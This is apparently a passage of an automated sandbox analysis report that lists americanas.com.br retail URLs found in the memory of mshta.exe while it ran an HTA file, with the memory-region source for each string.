Source: mshta.exe, 00000000.00000003.2533905851.000000000DD25000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/hotsite/banner-suplementos?chave=dk_hm_bn_5_8_suplementosmeta.largemet
Source: mshta.exe, 00000000.00000003.2654927301.000000000A9D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2774829877.000000000A9E9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2728492044.000000000A9E8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2727732575.000000000A9D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654927301.000000000A91C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654573582.000000000A918000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/hotsite/banner-ud?chave=dk_hm_bn_5_7_ud
Source: mshta.exe, 00000000.00000003.2533905851.000000000DD25000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/hotsite/banner-ud?chave=dk_hm_bn_5_7_udmeta.largemeta.large.heightmeta
Source: mshta.exe, 00000000.00000003.2664171298.0000000006E3E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2648378979.000000000C178000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2676815165.000000000AA24000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2612013556.000000000DCF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2744826440.000000000AA29000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2652668755.000000000AA1E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668949528.000000000AA1F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2775010969.000000000AA2A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2650675847.000000000A9FC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654927301.000000000A91C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2676562635.000000000AA1F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2653491423.0000000006E32000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539284550.000000000DC65000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654573582.000000000A918000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668090203.000000000C191000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/hotsite/campanha-brinquedos?chave=dk_hm_dt_2_8_brinquedos
Source: mshta.exe, 00000000.00000003.2654927301.000000000A9D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2648378979.000000000C178000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2538310742.000000000654C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668909643.000000000A8B1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2655488745.00000000092A5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2612013556.000000000DCF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2651095257.00000000092A1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668398885.000000000A8AE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2727732575.000000000A9D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2774601657.000000000A9D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2675583442.000000000A8B9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539284550.000000000DC65000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2660536258.000000000A8AD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2649378434.0000000009293000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2650997634.000000000A8A8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668090203.000000000C191000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/hotsite/cupom-de-desconto-americanas?chave=prf_hm_0_tt_9_cupom
Source: mshta.exe, 00000000.00000003.2664171298.0000000006E3E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2648378979.000000000C178000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539093829.000000000653B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2660215955.000000000C102000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668909643.000000000A8B1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2655488745.00000000092A5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2612013556.000000000DCF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2651095257.00000000092A1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668398885.000000000A8AE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2656547873.0000000003426000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2652183506.000000000C0E9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2675583442.000000000A8B9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2665620808.000000000C10A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2670707153.00000000092B3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2658032255.00000000092B2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2653491423.0000000006E32000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2766365966.0000000003426000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539284550.000000000DC65000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654534140.000000000C0F5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2660536258.000000000A8AD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2656497357.00000000092AC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/hotsite/cuponeria?chave=dk_hm_ft_00_07_cuponeria
Source: mshta.exe, 00000000.00000003.2664171298.0000000006E3E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2648378979.000000000C178000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2533905851.000000000DD25000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2727062236.000000000A851000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2612013556.000000000DCF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654927301.000000000A91C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2653491423.0000000006E32000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539284550.000000000DC65000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654573582.000000000A918000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668090203.000000000C191000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/hotsite/destaque-automotivo?chave=
Source: mshta.exe, 00000000.00000003.2654927301.000000000A9D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2664171298.0000000006E3E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2648378979.000000000C178000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2533905851.000000000DD25000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2612013556.000000000DCF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2653785457.0000000009354000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2727732575.000000000A9D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2649378434.0000000009354000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654927301.000000000A91C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2774601657.000000000A9D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2714211819.0000000009A89000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2653491423.0000000006E32000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539284550.000000000DC65000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2751738546.0000000009355000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2661257377.0000000009354000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2726617731.0000000009354000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654573582.000000000A918000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2705339343.0000000009A87000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668090203.000000000C191000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/hotsite/destaque-clima?chave=
Source: mshta.exe, 00000000.00000003.2664171298.0000000006E3E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2648378979.000000000C178000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2533905851.000000000DD25000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2727732575.000000000A9AE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2612013556.000000000DCF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2774601657.000000000A9AE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654927301.000000000A91C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654927301.000000000A9AE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2653491423.0000000006E32000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539284550.000000000DC65000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654573582.000000000A918000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668090203.000000000C191000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/hotsite/destaque-evento-brinq-esporte?chave=dk_hm_dt_2_9_brinquesporte
Source: mshta.exe, 00000000.00000003.2648378979.000000000C178000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2612013556.000000000DCF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2747059165.0000000006E3D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2714050427.0000000009A9F000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654927301.000000000A91C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2642469328.0000000009A9B000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2695665555.0000000009A9D000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2653491423.0000000006E32000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2705849997.0000000009A9E000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539284550.000000000DC65000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654573582.000000000A918000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668090203.000000000C191000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2667077369.0000000009358000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/hotsite/destaque-moveis?chave=dk_hm_dt_2_1_moveis
Source: mshta.exe, 00000000.00000003.2654927301.000000000A9D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2727732575.000000000A9D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2774601657.000000000A9D6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/hotsite/destaque-moveis?chave=dk_hm_dt_2_1_moveis#
Source: mshta.exe, 00000000.00000003.2664171298.0000000006E3E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2648378979.000000000C178000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2676815165.000000000AA24000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2612013556.000000000DCF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2744826440.000000000AA29000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2652668755.000000000AA1E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668949528.000000000AA1F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2775010969.000000000AA2A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2650675847.000000000A9FC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654927301.000000000A91C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2676562635.000000000AA1F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2653491423.0000000006E32000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539284550.000000000DC65000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654573582.000000000A918000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668090203.000000000C191000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/hotsite/destaque-portateis?chave=dk_hm_dt_2_7_portateis
Source: mshta.exe, 00000000.00000003.2664171298.0000000006E3E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2648378979.000000000C178000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2612013556.000000000DCF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654927301.000000000A91C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2653491423.0000000006E32000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539284550.000000000DC65000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654573582.000000000A918000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668090203.000000000C191000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/hotsite/destaque-telefonia?chave=dk_hm_dt_2_4_telefonia
Source: mshta.exe, 00000000.00000003.2664171298.0000000006E3E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668217939.000000000A919000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2648378979.000000000C178000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2533905851.000000000DD25000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2657042776.00000000092E2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2667474903.00000000092FF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2666836298.00000000092E3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2655488745.00000000092A5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2612013556.000000000DCF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2651095257.00000000092A1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654927301.000000000A91C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2653491423.0000000006E32000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2666770510.000000000A919000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539284550.000000000DC65000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2656497357.00000000092AC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654573582.000000000A918000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2714183267.0000000009A53000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2649378434.0000000009293000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2751165460.000000000A919000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668090203.000000000C191000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/hotsite/destaque-tvs?chave=
Source: mshta.exe, 00000000.00000003.2664171298.0000000006E3E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2648378979.000000000C178000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539093829.000000000653B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668909643.000000000A8B1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2647607902.000000000C305000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2676815165.000000000AA24000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2612013556.000000000DCF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2744826440.000000000AA29000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2747376741.000000000C306000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668398885.000000000A8AE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2652668755.000000000AA1E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668949528.000000000AA1F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2775010969.000000000AA2A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2650675847.000000000A9FC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2746776298.000000000C306000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2748881120.000000000C306000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2675583442.000000000A8B9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2676562635.000000000AA1F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2777141296.000000000C306000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2653491423.0000000006E32000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539284550.000000000DC65000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/hotsite/duvidas-marketplace?chave=footeracom_marketplace
Source: mshta.exe, 00000000.00000003.2648378979.000000000C178000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2538310742.000000000654C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668909643.000000000A8B1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2655488745.00000000092A5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2612013556.000000000DCF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2651095257.00000000092A1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668398885.000000000A8AE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2770661764.00000000092B9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2675583442.000000000A8B9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2657306854.00000000092B8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539284550.000000000DC65000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2660536258.000000000A8AD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2656497357.00000000092AC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2649378434.0000000009293000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2650997634.000000000A8A8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668090203.000000000C191000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/hotsite/electrolux-refrigerador-dez-21
Source: mshta.exe, 00000000.00000003.2654927301.000000000A9D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2774829877.000000000A9E9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2728492044.000000000A9E8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2727732575.000000000A9D6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/hotsite/electrolux-refrigerador-dez-213
Source: mshta.exe, 00000000.00000003.2664171298.0000000006E3E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2648378979.000000000C178000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2612013556.000000000DCF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654927301.000000000A91C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2653491423.0000000006E32000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539284550.000000000DC65000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654573582.000000000A918000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2667416562.000000000A88F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668090203.000000000C191000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2774190260.000000000A890000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/hotsite/eletrodom-campanha?chave=dk_hm_dt_2_2_edom
Source: mshta.exe, 00000000.00000003.2664171298.0000000006E3E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668217939.000000000A919000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2648378979.000000000C178000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2726617731.0000000009314000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2657042776.00000000092E2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2666836298.00000000092E3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539093829.000000000653B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2660215955.000000000C102000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668909643.000000000A8B1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2655488745.00000000092A5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2612013556.000000000DCF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2651095257.00000000092A1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2656547873.0000000003410000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668398885.000000000A8AE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2652183506.000000000C0E9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2675583442.000000000A8B9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2665620808.000000000C10A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2653491423.0000000006E32000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2766288586.0000000003410000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2666770510.000000000A919000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539284550.000000000DC65000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/hotsite/entregas?WT.mc_id=d_entrega_footer
Source: mshta.exe, 00000000.00000003.2664171298.0000000006E3E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2648378979.000000000C178000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2772182378.0000000009401000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539093829.000000000653B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668909643.000000000A8B1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2612013556.000000000DCF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668398885.000000000A8AE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2656004921.00000000093F1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2728196280.0000000009404000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2675583442.000000000A8B9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2727692959.0000000006E97000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2661257377.00000000093F1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2653491423.0000000006E32000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2665118307.00000000093F1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539284550.000000000DC65000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2660536258.000000000A8AD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2648570503.0000000006E7D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2726694217.0000000009401000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2669377685.0000000009401000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2650997634.000000000A8A8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668090203.000000000C191000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/hotsite/guia-de-seguranca?chave=brd_hm_bt_0_footer_guiaseguranca
Source: mshta.exe, 00000000.00000003.2714640345.0000000009A55000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2665485857.000000000C095000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2667632978.000000000C0CD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2664712398.000000000C095000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2666216386.000000000C0BC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2705493492.0000000009A54000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2666159543.000000000C0A7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2648901167.000000000C08D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2667416562.000000000A88F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2774190260.000000000A890000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/hotsite/ofertasdatv?chave=dk_hm_ats_2_5_ofertasdatv
